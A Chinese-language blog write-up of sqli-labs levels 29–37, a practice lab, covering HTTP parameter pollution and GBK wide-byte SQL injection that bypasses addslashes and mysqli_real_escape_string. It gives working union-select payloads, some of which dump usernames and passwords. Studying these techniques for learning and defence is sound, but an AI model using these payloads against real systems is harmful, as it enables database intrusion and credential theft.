首先是对传进来的?后面的值带入到java_implimentation()里面,这个函数是防止我们往id=后面加&所有做个判断只取id=后和&之间的内容,目前我也没用过&构造查询语句啊,继续往下看吧

whitelist($id1);

然后是这个函数对处理后的id1的值进行判断是不是纯数字,不是就重新开始

但还是有问题,问题出在哪呢
在这里插入图片描述
出在这,他虽然对id值进行各种判断各种过滤,但没有取最终过滤好的id1啊,依旧取了前端直接传来的id,这属于开发逻辑上的错误的,所有我们这里只需要绕过判断即可

1&id=-1' union select 1,2,3 -- -

完整链接

http://localhost/sqli/Less-29/login.php?id=1&id=-1' union select 1,2,3 -- -

查询语句

SELECT * FROM users WHERE id='-1' union select 1,2,3 -- -' LIMIT 0,1

$_GET的取值方式

这里还用到一个知识点就是,我们传了两个id值,一个是1,一个是-1' union select 1,2,3 -- -当有两个id值,$_GET会取哪个,$_GET应该是从后往前取的,我们看一下
在这里插入图片描述
在这里插入图片描述
所以我们再看一下我之前给的payload

在这里插入图片描述
取的值是后面的值

所以这题能产生注入的点就是因为$_GET方法的取值

less-30

标题:GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application

这关跟29关一样,也说有个防火墙,就是没搞懂,有搞懂的大哥求求私信告诉我

第30关跟29关情况一样,index.php就是变成了"闭合

less-31

标题: GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application

跟29、30关一样,只不过闭合变成了")

less-32

标题:GET - Bypass custom filter adding slashes to dangerous chars

页面上有两句话
在这里插入图片描述

Hint: The Query String you input is escaped as : 1
The Query String you input in Hex becomes : 31
/提示:您输入的查询字符串转义为:1
/以十六进制输入的查询字符串变为:31

我们看一下源码,里面加了两个自定义方法

strToHex()

function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}

strlen()

定义用法:

strlen() 函数返回字符串的长度,中文字符串的处理使用 mb_strlen() 函数。

语法:

strlen(string)

详见PHP strlen() 函数

ord()

定义和用法:

ord() 函数返回字符串中第一个字符的 ASCII 值。

语法:

ord(string)

详见PHP ord() 函数

dechex()

定义和用法:

dechex() 函数把十进制数转换为十六进制数。
提示:如需把十六进制转换为十进制,请查看 hexdec() 函数。

语法:

dechex(number);

详见PHP dechex() 函数

用户自定义的strToHex方法实际上是将转义后的字符串转换为16进制

我们再看作者另一个自定义方法
check_addslashes()

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    return $string;
}

preg_quote()

详见PHP preg_quote() 函数

定义和用法:

preg_replace 函数用于转义正则表达式字符。
preg_quote() 需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。

正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { } = ! < > | : -

语法:

string preg_quote ( string $str [, string $delimiter = NULL ] )
参数描述
$str输入字符串。
$delimiter如果指定了可选参数 delimiter,它也会被转义。这通常用于 转义 PCRE 函数使用的分隔符。 / 是最通用的分隔符
 $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);

这一行代码
正则匹配部分:\\经过preg_quote()函数处理为\\\\,经PHP解释器转为\\,经正则解释器转为\
替换部分:

可参考:【PHP】之4个反斜杠、3个反斜杠的情况

$string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash

$id=check_addslashes($_GET['id']);

以及'"都会被此函数添加\转义字符

此题的注入点在数据库编码格式上,产生了宽字节注入,成因可详见宽字节注入原理分析,我们数据库的编码格式为

后台查询前也设置了语句:

mysqli_query($con1, "SET NAMES gbk");

此语句用于设定字符集,重启后无效
在这里插入图片描述

通俗的讲是服务器采用了宽字节编码,像GB2312、GBK、GB18030、BIG5、Shift_JIS等
此编码格式两个字节代表一个汉字

例1:我们前端传值为'
在这里插入图片描述
后端添加转义符号,\的GBK16进制编码为%5c'的GBK16进制编码为%27,这是正常转义流程

例2:我们前端传值为%df'
在这里插入图片描述
%df%5c是繁体字,我们用这种方法来与\拼成新的字符,以此来绕过后端转义

所以我们可以构造payload

-1%df' union select 1,2,3 -- -

查询语句:

SELECT * FROM users WHERE id='-1運' union select 1,2,3 -- -' LIMIT 0,1

在这里插入图片描述
查用户名密码

paylaod:

-1%df' union select 1,(select GROUP_CONCAT(username,0x7e,password) from users),3 -- -

查询语句:

SELECT * FROM users WHERE id='-1運' union select 1,(select GROUP_CONCAT(username,0x7e,password) from users),3 -- -' LIMIT 0,1

在这里插入图片描述
less-33

标题: GET - Bypass AddSlashes()

这一关跟32关一样是宽字节注入,只不过呢,转义函数是addslashes()

function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}

addslashes()

定义和用法:

addslashes() 函数返回在预定义的字符前添加反斜杠的字符串。

预定义字符是:

单引号(')
双引号(")
反斜杠(\)
NULL

语法:

addslashes(string)

一样的效果

查用户名密码

paylaod:

-1%df' union select 1,(select GROUP_CONCAT(username,0x7e,password) from users),3 -- -

查询语句:

SELECT * FROM users WHERE id='-1運' union select 1,(select GROUP_CONCAT(username,0x7e,password) from users),3 -- -' LIMIT 0,1

在这里插入图片描述

less-34

标题:POST - Bypass AddSlashes()

跟33关一样的,不过提交类型是POST,burpsuite抓包

payload:

-1%df' union select 1,2-- -

less-35

标题:GET - Bypass AddSlashes (we dont need them) Integer based

正如题目所说是整数型注入,看一下源码

function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

addslashes()只转义'"\NULL
所有对于整数型注入,就没有什么意义的,这个题可以定义为无效转义联合查询

less-36

标题:GET - Bypass MySQL_real_escape_string

这一关采用的是mysqli_real_escape_string()做转义

function check_quotes($con1, $string)
{
    $string=mysqli_real_escape_string($con1, $string);    
    return $string;
}

mysqli_real_escape_string()

详见PHP mysqli_real_escape_string() 函数

定义和用法:

mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

语法:

mysqli_real_escape_string(connection,escapestring);
参数描述
connection必需。规定要使用的 MySQL 连接。
escapestring必需。要转义的字符串。编码的字符是 NUL(ASCII 0)、\n、\r、\、'、" 和 Control-Z。

跟之前的转义函数差不多

payload:

-1%df' union select 1,(select GROUP_CONCAT(username,0x7e,password) from users),3 -- -

less-37

标题:POST - Bypass MySQL_real_escape_string

POST类型提交,原理跟之前一样

payload:

1%df' union select 1,group_concat(password,username) from users--+
徐记荣
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQLi-LABS Page-2 (Adv Injections)
qq_61774705的博客
08-09 515
mysql
sqli-labs(Page 2)
Lorezon的博客
04-12 246
Less-21
SQLi-LABS Page-2 (Adv Injections) Less23-Less26
weixin_30788731的博客
06-21 359
Less-23 GET - Error based - strip comments http://10.10.202.112/sqli/Less-23?id=1' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\phpStudy2018\PHPTutorial\WWW\...
SQLI-LABS——Page-2 Advanced Injections Less21~Less37
Ho1aAs‘s Blog
04-02 281
文章目录前言题解Less-21Less-22Less-23 limit Comment markLess-24 change the admin's passwordLess-25 limit AND and ORLess-25aLess-26 Error based,limit AND,OR,SPACE,Comment,error basedLess-26a Blind based,adding parenthesis based 26Less-27 Error based,limit SELECT an
SQLi-LABS-Page-2-(Adv-Injections)less-23-38注入教程
残阳泼茶香的博客
03-17 498
less 23 GET - Error based - strip comments 基于错误的,过滤注释的GET型 在源码中有这么一段话,过滤了#和–,替换成‘ ’,要想绕过注释过滤,那就只能闭合绕过,多行注释符好像不行 $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, ...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqlilabs——Pages2
(∪.∪ )...zzz的博客
12-11 354
tag21 cookie注入 base64源码解读22 Cookie注入 报错型 双引号 base64编码23 基于错误的,过滤注释的GET型24 二次注入25 过滤or and源码解读25a 过滤or and 盲注26 过滤空格注释 报错型源码分析26a 过滤空格注释 盲注27 过滤union select27a 过滤空格 注释 union select 盲注28 过滤union select 双引号闭合28a 过滤空格 注释 union select ') 盲注29 参数污染3031宽字节注入
sql-labs靶场第23-53新手通关学习详解
m0_70483044的博客
11-10 1209
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
sql-labs(21-35)
m0_74456293的博客
03-03 104
sql-labs(21-35)
第六天 SQL注入
weixin_46653764的博客
05-28 695
一、sql注入的原理 不管是用什么语言编写的Web应用,它们都有一个共同点,就是具有交互性并且大多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞。 **sql注入**是一种通过操作sql语句进行攻击目的的技术 二、MYSQL注入--上部分 1、sql语句 创建数据库:CREATE DATABASE database_name 删除数据库:drop database database_name 创建新表:create table mytabl
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2390
Sqli-Labs靶场
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
[BJDCTF 2nd]简单注入
CyhDl666的博客
03-11 212
访问robots.txt,得到hint.php,得到sql注入的源码 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 一开始尝试了一些'闭合 okkk!'被过滤了 那就从这个sql语句入手想想办法 记得以前学过一个addslashes()函数利用\去转义,看看效果 select * from users where username='123\' and pass.
SQL注入之二次注入(sql-lab第24关)
_Co1a
12-22 1249
什么是二次注入 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户 输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 二次注入原理分为两步 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。 第二
SQL注入---二次注入
selecthch的博客
06-19 3432
今天接触到了二次注入,写个博客方便以后学习。 1.二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 也就是说在...
sqli-labs通关28
最新发布
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值